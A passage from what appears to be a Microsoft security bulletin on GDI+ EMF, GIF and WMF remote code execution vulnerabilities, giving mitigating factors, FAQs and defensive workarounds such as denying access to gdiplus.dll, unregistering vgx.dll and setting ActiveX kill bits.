\r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update removes the vulnerability by modifying the way that GDI+ processes gradient sizes handled by the vector graphics link library.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nGDI+ EMF Memory Corruption Vulnerability - CVE-2008-3012\r\n\r\nA remote code execution vulnerability exists in the way that GDI+ handles memory allocation. The vulnerability could allow remote code execution if a user opens a specially crafted EMF image file or browses to a Web site that contains specially crafted content. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2008-3012.\r\n\t\r\nMitigating Factors for GDI+ EMF Memory Corruption Vulnerability - CVE-2008-3012\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nThe vulnerability could be exploited by an attacker who convinced a user to open a specially crafted file. There is no way for an attacker to force a user to open a specially crafted file.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for GDI+ EMF Memory Corruption Vulnerability - CVE-2008-3012\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRestrict access to gdiplus.dll\r\n\r\n1. Run the following commands from an elevated administrator command prompt\r\n\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\Microsoft.NET\Framework\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\winsxs\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\Downloaded Program Files\gdiplus.dll^"') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Digital Image 2006\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Digital Image 2006\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Works\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Works\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VGX\vgx.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VGX\vgx.dll" /E /P everyone:N\r\n\r\n2. Restart\r\n\r\nImpact of workaround. Windows Picture and Fax Viewer (on editions prior to Windows Vista) and other applications that rely on GDI+ will not be able to view images. Also, thumbnails in Windows Explorer (on versions prior to Vista) will not display.\r\n\r\nHow to undo the workaround.\r\n\r\n1. Run the following commands from an elevated administrator command prompt\r\n\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\Microsoft.NET\Framework\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\winsxs\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\Downloaded Program Files\gdiplus.dll^"') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Digital Image 2006\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Digital Image 2006\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Works\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Works\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\ Common Files\Microsoft Shared\VGX\vgx.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\ Common Files\Microsoft Shared\VGX\vgx.dll" /E /R everyone\r\n\r\n2. Restart\r\n\u2022\t\r\n\r\nUnregister vgx.dll\r\nTo mitigate the Web-based attack vector:\r\n\r\n1. Click Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" -u "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2. A dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.\r\n\r\nImpact of workaround. Applications that render VML will no longer do so once vgx.dll has been unregistered.\r\n\r\nHow to undo the workaround.\r\n\r\n1. Click Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2. A dialog box appears to confirm that the registration process has succeeded. Click OK to close the dialog box.\r\n\u2022\t\r\n\r\nPrevent RSClientPrint from running in Internet Explorer\r\n\r\nYou can disable attempts to instantiate RSClientPrint in Internet Explorer by setting the kill bit for the control in the registry.\r\n\r\nWarning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.\r\n\r\nFor detailed steps that you can use to prevent a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow these steps in this article to create a Compatibility Flags value in the registry to prevent RSClientPrint from being instantiated in Internet Explorer.\r\n\r\nPaste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=dword:00000400\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=dword:00000400\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\n\r\nImpact of workaround. There is no impact as long as the object is not intended to be used in Internet Explorer.\r\n\r\nHow to undo the workaround.\r\n\r\nPaste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=-\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=-\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for GDI+ EMF Memory Corruption Vulnerability - CVE-2008-3012\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by a memory corruption when GDI+ improperly processes a specially crafted EMF image file.\r\n\r\nWhat is the Enhanced Metafile (EMF) image format? \r\nAn EMF image is a 32-bit format that can contain both vector information and bitmap information. This format is an improvement over the Windows Metafile Format and contains extended features.\r\n\r\nFor more information about image types and formats, see Microsoft Knowledge Base Article 320314. Additional information about these file formats is also available at the MSDN Library Web Site.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis vulnerability requires that a user open or view a specially crafted image file.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially-crafted EMF image file or an Office document with a specially-crafted EMF image file embedded in it to the user and by convincing the user to open the document or view the e-mail containing the specially crafted image file.\r\n\r\nIn a Web-based attack scenario, an attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. This can also include compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger request that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user is logged on and reading e-mail messages or is visiting Web sites for any malicious action to occur. Therefore, any systems where e-mail messages are read or where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability. Systems that are not typically used to visit Web sites, such as most server systems, are at a reduced risk.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update removes the vulnerability by modifying the way that GDI+ handles memory allocation with EMF image files.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nGDI+ GIF Parsing Vulnerability - CVE-2008-3013\r\n\r\nA remote code execution vulnerability exists in the way that GDI+ parses GIF images. The vulnerability could allow remote code execution if a user opens a specially crafted GIF image file or browses to a Web site that contains specially crafted content. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2008-3013.\r\n\t\r\nMitigating Factors for GDI+ GIF Parsing Vulnerability - CVE-2008-3013\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nThe vulnerability could be exploited by an attacker who convinced a user to open a specially crafted file. There is no way for an attacker to force a user to open a specially crafted file.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for GDI+ GIF Parsing Vulnerability - CVE-2008-3013\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRestrict access to gdiplus.dll\r\n\r\n1. Run the following commands from an elevated administrator command prompt\r\n\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\Microsoft.NET\Framework\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\winsxs\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\Downloaded Program Files\gdiplus.dll^"') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Digital Image 2006\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Digital Image 2006\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Works\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Works\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VGX\vgx.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VGX\vgx.dll" /E /P everyone:N\r\n\r\n2. Restart\r\n\r\nImpact of workaround. Windows Picture and Fax Viewer (on editions prior to Windows Vista) and other applications that rely on GDI+ will not be able to view images. Also, thumbnails in Windows Explorer (on versions prior to Vista) will not display.\r\n\r\nHow to undo the workaround.\r\n\r\n1. Run the following commands from an elevated administrator command prompt\r\n\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\Microsoft.NET\Framework\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\winsxs\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\Downloaded Program Files\gdiplus.dll^"') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Digital Image 2006\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Digital Image 2006\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Works\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Works\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\ Common Files\Microsoft Shared\VGX\vgx.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\ Common Files\Microsoft Shared\VGX\vgx.dll" /E /R everyone\r\n\r\n2. Restart\r\n\u2022\t\r\n\r\nUnregister vgx.dll\r\nTo mitigate the Web-based attack vector:\r\n\r\n1. Click Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" -u "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2. A dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.\r\n\r\nImpact of workaround. Applications that render VML will no longer do so once vgx.dll has been unregistered.\r\n\r\nHow to undo the workaround.\r\n\r\n1. Click Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2. A dialog box appears to confirm that the registration process has succeeded. Click OK to close the dialog box.\r\n\u2022\t\r\n\r\nPrevent RSClientPrint from running in Internet Explorer\r\n\r\nYou can disable attempts to instantiate RSClientPrint in Internet Explorer by setting the kill bit for the control in the registry.\r\n\r\nWarning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.\r\n\r\nFor detailed steps that you can use to prevent a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow these steps in this article to create a Compatibility Flags value in the registry to prevent RSClientPrint from being instantiated in Internet Explorer.\r\n\r\nPaste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=dword:00000400\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=dword:00000400\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\n\r\nImpact of workaround. There is no impact as long as the object is not intended to be used in Internet Explorer.\r\n\r\nHow to undo the workaround.\r\n\r\nPaste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=-\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=-\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for GDI+ GIF Parsing Vulnerability - CVE-2008-3013\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused when GDI+ improperly parses records in a specially crafted GIF image file.\r\n\r\nWhat is Graphics Interchange Format (GIF) image format? \r\nGraphics Interchange Format (GIF) images are single or multiple raster files that support transparency, compression, interlacing, and multiple-image pictures (animated GIFs).\r\n\r\nFor more information about image types and formats, see Microsoft Knowledge Base Article 320314. Additional information about these file formats is also available at the MSDN Library Web Site.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis vulnerability requires that a user open or view a specially crafted image file.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially-crafted EMF image file or an Office document with a specially-crafted EMF image file embedded in it to the user and by convincing the user to open the document or view the e-mail containing the specially crafted image file.\r\n\r\nIn a Web-based attack scenario, an attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. This can also include compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger request that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user is logged on and reading e-mail messages or is visiting Web sites for any malicious action to occur. Therefore, any systems where e-mail messages are read or where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability. Systems that are not typically used to visit Web sites, such as most server systems, are at a reduced risk.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update removes the vulnerability by modifying the way that GDI+ parses GIF image files.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nGDI+ WMF Buffer Overrun Vulnerability - CVE-2008-3014\r\n\r\nA remote code execution vulnerability exists in the way that GDI+ allocates memory for WMF image files. The vulnerability could allow remote code execution if a user opens a specially crafted WMF image file or browses to a Web site that contains specially crafted content. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2008-3014.\r\n\t\r\nMitigating Factors for GDI+ WMF Buffer Overrun Vulnerability - CVE-2008-3014\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nThe vulnerability could be exploited by an attacker who convinced a user to open a specially crafted file. There is no way for an attacker to force a user to open a specially crafted file.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced 